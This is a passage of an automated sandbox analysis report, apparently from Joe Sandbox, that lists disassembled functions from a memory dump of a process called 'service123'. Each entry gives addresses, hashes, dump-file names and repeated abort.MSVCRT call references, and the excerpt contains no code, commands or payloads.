Function 6C34A1E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 850c0550dd8d1cf2db01de074a0afe4ebd5ab410602f8bdc2da565f382938055
Instruction ID: 2200375f98b9705283583ad5a97e16029970250a64f3571be414d8eb85028ea3
Opcode Fuzzy Hash: 850c0550dd8d1cf2db01de074a0afe4ebd5ab410602f8bdc2da565f382938055
Instruction Fuzzy Hash: E1D012B1E081009F8B00EE28C541826FBB0AB46208B94D954D45857A05D333D4168F56

Function 6C31D974 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction ID: b9f19d2a089319f591c0a1339ec34194c3d3c0c1a050356ea796db0d9483325a
Opcode Fuzzy Hash: 99528a8814be3e8ec686a86f925677d1370c2879c6c577cffe59eab6e90d6a45
Instruction Fuzzy Hash: 68C0C9B19441084ACF40EF34C0800B8F6F1AB42248F125458C09497600E771C8469A86

Function 6C31D674 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction ID: 472e7e2af86fcf7b873956ee25d5592b7c026a10720368371ffa0ea1f3365c10
Opcode Fuzzy Hash: 8d714ddeb1d54d60c99730855744db3a24bee261a28e7de1cd23f2af7a586b1f
Instruction Fuzzy Hash: 9EC012B19442044BCF40EF34C0C00BCF3F1AB42248F535858C094D7700E731D846DB46

Function 6C31D7F4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction ID: 5acc1e151ced79b304f9e6bc30fa2b2f866678b731a1ea9293c1588adca9f784
Opcode Fuzzy Hash: 6687b09114d2675d96a31c0c6d2971c8d0cefab2a3ab88b4dde04cb7df0e6767
Instruction Fuzzy Hash: 91C0E9B19456184ADF41EF78C0845B8F7F1AB42244F565458C494D7600E775D846DA46

Function 6C30B1D0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction ID: e3811ef16094eaf472bc2a896dde4ff48864d04ac6c8740455477ae59b1047cb
Opcode Fuzzy Hash: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction Fuzzy Hash: 61C012B8C092409AC200BF38C10A2ACBAB07F52208F8428ACD48423701E735C41C8A5B

Function 6C2F28FA Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Strings

L:=l, xrefs: 6C2F2929

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID: L:=l
API String ID: 4206212132-1485877340
Opcode ID: aacba23b08aecc69dffea97cdfdbb478e03f8548cb74452be8f33236c5304989
Instruction ID: 5d9080d1e39c8e18c422e52271f4de961c1ae65e03e0d757112e416fcc58ccb2
Opcode Fuzzy Hash: aacba23b08aecc69dffea97cdfdbb478e03f8548cb74452be8f33236c5304989
Instruction Fuzzy Hash: 9511D3B2642205CBE708FF1CE892F59B7B0FB21309F019A48D594D7A11D739E818CF91

Function 6C2F2A2F Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Strings

V:=l, xrefs: 6C2F2A5E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID: V:=l
API String ID: 4206212132-1925201791
Opcode ID: 7d61dcc227f9f4267f5d13991884260856611ec11b0210e5adc1359891c7a7e1
Instruction ID: c4bc6886c4af79d4007d547c9b92bf7abd35a15a7cc980643bfc57ef7f1a4186
Opcode Fuzzy Hash: 7d61dcc227f9f4267f5d13991884260856611ec11b0210e5adc1359891c7a7e1
Instruction Fuzzy Hash: AE11E5B2642205CBE308FF1CE492F59B7B0FB11309F019A48D594D7A11D739E818CF91

Function 6C2F29B1 Relevance: 50.8, APIs: 28, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Strings

`:=l, xrefs: 6C2F29E0

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID: `:=l
API String ID: 4206212132-3316130787
Opcode ID: ff43167981c402d00bd47b1d3820033de5a09a20caf4c91ae441b48ecea7d983
Instruction ID: 05aacdbca814d95c22030f39c51103c4bd44ef87cc637b8165af10720ef87baf
Opcode Fuzzy Hash: ff43167981c402d00bd47b1d3820033de5a09a20caf4c91ae441b48ecea7d983
Instruction Fuzzy Hash: 5AF030B2645205CBD704EF18D0D5B6AB770FF1230CF019948C4949BB05D775E869CF96

Function 6C2FBAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Strings

@, xrefs: 6C2FBAB1

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: 3e942ff8c82cb4a89c34bef5b26b1664ac4e412973b144b41a6f07902916e7c5
Instruction ID: 80ecae83f610c8230ecbf49cf143c09acfc5aa020d28c570687ab5c89184f84d
Opcode Fuzzy Hash: 3e942ff8c82cb4a89c34bef5b26b1664ac4e412973b144b41a6f07902916e7c5
Instruction Fuzzy Hash: 2EB1173264931E8FC710CE2CC4D0769F7E6AB85314F498569EDA597B95C335EC0ACB82

Function 6C2F2290 Relevance: 42.4, APIs: 28, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abf1e235832d0e605445d0999464fad7976d44631757062ef3edacb2e1e66ab0
Instruction ID: 92b0a5fef07f1942a80d8ac98645f1bb27423e8fabf06f15d27145908fe54fb4
Opcode Fuzzy Hash: abf1e235832d0e605445d0999464fad7976d44631757062ef3edacb2e1e66ab0
Instruction Fuzzy Hash: 5BC1DDF168024A8FD7048F28C48475AF7E2AB46308F449969DCA8CFB05D779E94B8F90

Function 6C2FB7A0 Relevance: 42.2, APIs: 28, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66035d50beb4595e9749a2cf4447cd2189063d04f317ec60b0b95e0b51b58383
Instruction ID: 031fd92c39ebbb56f28aa75372b5701bf4e2e03209e880bf195fa1d533622d70
Opcode Fuzzy Hash: 66035d50beb4595e9749a2cf4447cd2189063d04f317ec60b0b95e0b51b58383
Instruction Fuzzy Hash: 4541C47664934E9FE711DF29C080726BBF0AF85318F18859DEDA54BB42C335E846CB41

Function 6C2F29F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C3C6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
